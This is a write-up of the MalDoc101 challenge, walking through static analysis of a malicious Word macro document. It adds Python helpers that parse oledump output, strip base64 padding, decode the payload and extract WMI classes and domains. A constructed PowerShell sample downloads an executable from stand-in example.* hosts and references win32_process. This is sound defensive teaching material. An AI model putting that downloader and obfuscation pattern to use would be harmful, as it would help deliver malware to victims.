MalDoc101 | Cyberdefenders

Hello, this is my approach to solving the CyberDefenders MalDoc101 challenge, which can be found here.

Solving the challenge

We'll follow the questions in order to solve it.

Disclaimer:
It's better to solve the challenge yourself first before reading this, since it contains spoilers.

Challenge details

It's common for threat actors to utilize living off the land 
(LOTL) techniques, such as the execution of PowerShell to 
further their attacks and transition from macro code. This 
challenge is intended to show how you can often times perform 
quick analysis to extract important IOCs. 
The focus of this exercise is on static techniques for analysis.

Suggested Tools:

REMnux Virtual Machine (remnux.org)
Terminal/Command prompt w/ Python installed
Oledump
Text editor

I didn't actually use REMnux; I used Flare-VM instead, since most of the tools needed for this challenge also come with Flare-VM.

#1 Multiple streams contain macros in this document. Provide the number of highest one.

Let's use oledump, which is a tool in OLEtools and comes pre-installed in Flare-VM.

 oledump sample.bin > sample.txt


Open sample.txt in Sublime:

We see there are 3 streams with macros, i.e. the streams annotated with M or m. It's important to note that an uppercase M marks a stream holding a macro with code, while a lowercase m marks a macro stream belonging to a user form.


We take the highest-numbered stream among those annotated with macros and we get our answer.
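As an added example (not part of the original writeup), here is a small Python parser for the listing that `oledump sample.bin > sample.txt` produces. It reads each stream line, keeps the M/m indicator, and answers the "highest macro stream" and "user form stream" questions programmatically instead of by eyeballing Sublime. The listing embedded below is constructed in oledump's output format and is not the real output for the challenge sample.

```python
import re
from typing import List, NamedTuple

# Shape of one oledump.py listing line, e.g. "  7: M    1342 'Macros/VBA/Module1'":
# stream index, optional macro indicator (M = macro module with code, m = macro
# module that the writeup says belongs to the user form), size, quoted name.
_LINE_RE = re.compile(r"^\s*(\d+):\s+([Mm]?)\s*(\d+)\s+'(.*)'\s*$")


class Stream(NamedTuple):
    index: int
    indicator: str  # "M", "m" or "" when the stream holds no macro
    size: int
    name: str


def parse_oledump(listing: str) -> List[Stream]:
    """Parse the text saved from `oledump sample.bin > sample.txt`."""
    streams = []
    for line in listing.splitlines():
        m = _LINE_RE.match(line)
        if m:
            streams.append(Stream(int(m.group(1)), m.group(2), int(m.group(3)), m.group(4)))
    return streams


def macro_streams(streams: List[Stream], code_only: bool = False) -> List[Stream]:
    """Streams flagged M (and m unless code_only is set)."""
    wanted = {"M"} if code_only else {"M", "m"}
    return [s for s in streams if s.indicator in wanted]


def highest_macro_stream(streams: List[Stream], code_only: bool = False):
    """Answer to question 1: the highest stream number carrying a macro, or None."""
    macros = macro_streams(streams, code_only)
    return max(s.index for s in macros) if macros else None


def user_form_streams(streams: List[Stream]) -> List[Stream]:
    """Lowercase-m streams, which the writeup uses to find the user form (question 5)."""
    return [s for s in streams if s.indicator == "m"]


# Constructed listing in oledump's format; NOT the challenge sample's real output.
SAMPLE_LISTING = """\
  1:       114 'CompObj'
  2:      4096 'DocumentSummaryInformation'
  3:      7832 '1Table'
  4: M    2201 'Macros/VBA/ThisDocument'
  5: M    5120 'Macros/VBA/Module1'
  6: m    1011 'Macros/VBA/UserForm1'
  7:      3000 'Macros/UserForm1/o'
  8:      1200 'WordDocument'
"""

if __name__ == "__main__":
    streams = parse_oledump(SAMPLE_LISTING)
    for s in macro_streams(streams):
        print(f"{s.index:3d}: {s.indicator} {s.name}")
    print("highest macro stream:", highest_macro_stream(streams))
    print("user form modules:", [s.name for s in user_form_streams(streams)])
```

The `code_only` switch matters when the form module happens to have a higher index than the code modules: decide up front whether the question counts lowercase-m streams as "containing macros".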

#2 What event is used to begin the execution of the macros?

Here we use a tool called olevba, which extracts and analyzes VBA macro source code from MS Office documents.

olevba --deobf sample.bin > vba.txt

NOTE: --deobf asks olevba to attempt deobfuscation of the extracted code.

We open vba.txt in Sublime Text and look at the source code.


In olevba's AutoExec table we see the keyword that begins the macro's execution; that keyword is the event we are after.

#3 What malware family was this maldoc attempting to drop?
This was pretty easy. We get the MD5 of the file:

md5sum.exe sample.bin

Search for the MD5 hash on VirusTotal and right off the bat we see many similar files and their family, which is pretty common.

#4 What stream is responsible for the storage of the base64-encoded string?

We again view the vba.txt file in Sublime and see a large base64 string:


Note that the form string in the VBA tells us where the stream is; we then look it up in the file where we saved the oledump output and get our answer.

#5 This document contains a user-form. Provide the name?

Remember earlier when I said that a lowercase m in oledump marks the user form? Well, there goes our answer, LOL!
Refer to this image:


#6 This document contains an obfuscated base64 encoded string; what value is used to pad (or obfuscate) this string?

The fun begins here now!

oledump.py -s 15 --vbadecompresscorrupt sample.bin

NOTE: --vbadecompresscorrupt decompresses the VBA source while tolerating corruption, which gives us clean results for this sample's macros.


Scrolling down the code, I saw that it has a Split function:

feaxgeip = Split(geutyoeytiestheug, "2342772g3&*gs7712ffvs626fq")

Searching for the value of 'geutyoeytiestheug' in the code above shows that it has the same value as haothkoebtheil. That must be the obfuscated base64-encoded string, and the second argument to Split is the padding value.

#7 What is the program executed by the base64 encoded string?

Since we observed that the stream holding the base64 string is stream 34, we can now dump the contents of that stream:

oledump.py -s 34 -d sample.bin
-d performs a raw dump of the stream.

We can copy the output to a text file for better viewing:


We can clean out the junk in the dump, that is:

at the beginning of the dump:
 ☻¶;1��     ↑   �:  ►   ♦     ☻     �‼  �♫  ♣  �Page1O3G♣  �Page2O3G    �: �
 
 and at the end of the dump:
 ♦  �Tab3♦  �Tab4
     ☻↑ 5   ♠  ��    ☻  Tahoma  ♥   ♥

We use CyberChef to clean the code now; conveniently, CyberChef also comes pre-installed in Flare-VM, so that's to our advantage.

Upon launching CyberChef, we use the Find/Replace operation (with Find set to Simple string) to replace the padding string with nothing, leaving plain base64, as shown in the screenshot:


We see it is a PowerShell script, and hence we get our answer.
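The CyberChef recipe from questions 6 and 7 (strip the binary form junk, Find/Replace the padding token, From Base64) can be scripted so it is repeatable. The following is an added Python example, not code from the writeup or from the challenge. It uses the padding token quoted above, and it assumes, as CyberChef's later "Remove null bytes" step suggests, that the decoded payload is UTF-16LE text of the kind `powershell -EncodedCommand` expects; the sample dump it builds is constructed here and is not the challenge's real stream.

```python
import base64
import re

# The delimiter the macro passes to Split(); quoted from the writeup.
PAD = "2342772g3&*gs7712ffvs626fq"

# A long run of base64 characters plus the characters that occur in the pad token.
_BLOB_RE = re.compile(r"[A-Za-z0-9+/=&*]{40,}")


def strip_form_junk(raw: bytes) -> str:
    """Turn the raw stream dump into text. Every non-printable byte (the binary
    UserForm header and trailer) becomes a space so it cannot glue onto the blob."""
    return "".join(chr(b) if 32 <= b < 127 else " " for b in raw)


def unpad(obfuscated: str, pad: str = PAD) -> str:
    """Undo the padding the same way the macro does: Split on the token and rejoin."""
    return "".join(obfuscated.split(pad))


def decode_payload(b64: str) -> str:
    """Base64-decode and return text. -EncodedCommand payloads are UTF-16LE, which is
    why 'Remove null bytes' made the CyberChef output readable; detect that by the NUL
    in the second byte, otherwise treat the bytes as single-byte text."""
    data = base64.b64decode(b64)
    if len(data) >= 2 and data[1] == 0:
        return data.decode("utf-16-le")
    return data.decode("latin-1")


def deobfuscate(raw: bytes, pad: str = PAD) -> str:
    """Full chain for an `oledump.py -s N -d` dump: junk -> longest blob -> unpad -> decode."""
    blobs = _BLOB_RE.findall(strip_form_junk(raw))
    if not blobs:
        raise ValueError("no base64-looking blob in the dump")
    return decode_payload(unpad(max(blobs, key=len), pad))


def looks_like_powershell(script: str) -> bool:
    """Cheap sanity check on the decoded text (question 7)."""
    pattern = r"\$\w+\s*=|New-Object|Invoke-|\bIEX\b|\[wmiclass\]"
    return re.search(pattern, script, re.I) is not None


# Constructed sample; the challenge's real script is deliberately not reproduced.
SAMPLE_SCRIPT = "$msg = 'constructed sample'; Write-Output $msg"


def build_sample(script: str = SAMPLE_SCRIPT, pad: str = PAD, every: int = 16) -> bytes:
    """Build a dump the way the maldoc stores it: UTF-16LE -> base64 -> pad token
    inserted between chunks -> wrapped in fake binary form header/trailer bytes."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    padded = pad.join(b64[i:i + every] for i in range(0, len(b64), every))
    header = b"\x02\x14;1\xff\x00\x18\x00Page1O3G\x00\x00Page2O3G\x00"
    trailer = b"\x00\x04Tab3\x04Tab4\x00\x02Tahoma\x03"
    return header + padded.encode("ascii") + trailer


if __name__ == "__main__":
    script = deobfuscate(build_sample())
    print("powershell?", looks_like_powershell(script))
    print(script)
```

Replacing non-printable bytes with spaces rather than deleting them is the one design choice worth noting: the form names ("Page1O3G", "Tab3") are printable, and simply deleting the NULs around them would fuse them onto the base64 blob and corrupt the decode.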

#8 What WMI class is used to create the process to launch the trojan?

We copy the output from CyberChef and decode it from base64 as follows:


In CyberChef we decode it with From Base64, then add Remove null bytes and the code beautify operation to get a cleaner output.

In the cleaned code we see the WMI class being defined inside an if statement; our answer is there.

#9 Multiple domains were contacted to download a trojan. Provide first FQDN as per the provided hint.

In our cleaned code we see various domains being called, but the question asks for the first domain, so we copy the first domain we see and we get our answer.
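For questions 8 and 9 the manual step is reading the beautified script for the `[wmiclass]` reference and the list of download domains. As an added example (not from the writeup), the Python below pulls both out of decoded script text with regular expressions, in order of appearance, so the "first FQDN" is the first element returned. The PowerShell fragment it runs on is constructed here with reserved example.* domains and is not the challenge's actual script; the `win32_process` class name in it is a real WMI class used as an illustrative value, not a claim about the challenge's answer.

```python
import re
from urllib.parse import urlsplit

# Constructed PowerShell fragment shaped like a downloader; NOT the challenge's script.
SAMPLE_DECODED = r"""
$dst = "$env:TEMP\stage.exe";
$urls = 'http://dl1.example.net/wp-content/@http://cdn.example.org/img/@https://files.example.com/up/'.Split('@');
foreach ($u in $urls) {
  try {
    (New-Object Net.WebClient).DownloadFile($u, $dst);
    if ((Get-Item $dst).Length -ge 40000) {
      $proc = [wmiclass]'win32_process';
      # launch of $dst via $proc omitted in this constructed sample
      break
    }
  } catch { }
}
"""

# [wmiclass]'Win32_Process', [wmiclass]"root\cimv2:Win32_Process", with or without quotes.
_WMI_RE = re.compile(r"""\[wmiclass\]\s*['"]?([\w:\\.-]+)""", re.I)
# http(s) URLs; '@' is excluded because the sample joins its URL list with it.
_URL_RE = re.compile(r"""https?://[^\s'"@)<>]+""", re.I)


def clean(script: str) -> str:
    """Drop NUL bytes left over from UTF-16 decoding (CyberChef's 'Remove null bytes')."""
    return script.replace("\x00", "")


def extract_wmi_classes(script: str) -> list:
    """Every WMI class referenced through the [wmiclass] type accelerator (question 8)."""
    return [m.group(1) for m in _WMI_RE.finditer(clean(script))]


def extract_fqdns(script: str) -> list:
    """Hostnames of all http(s) URLs, in order of first appearance, without duplicates."""
    seen, hosts = set(), []
    for m in _URL_RE.finditer(clean(script)):
        host = urlsplit(m.group(0)).hostname
        if host and host not in seen:
            seen.add(host)
            hosts.append(host)
    return hosts


def first_fqdn(script: str):
    """The first contacted domain (question 9), or None when the script has no URLs."""
    hosts = extract_fqdns(script)
    return hosts[0] if hosts else None


if __name__ == "__main__":
    print("WMI classes:", extract_wmi_classes(SAMPLE_DECODED))
    print("FQDNs:", extract_fqdns(SAMPLE_DECODED))
    print("first FQDN:", first_fqdn(SAMPLE_DECODED))
```

Running `clean()` first means the same functions work on the raw From Base64 output before the null-byte removal step, which is handy when a script is only available as the UTF-16 decoded text.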

That's all for that interesting maldoc challenge!!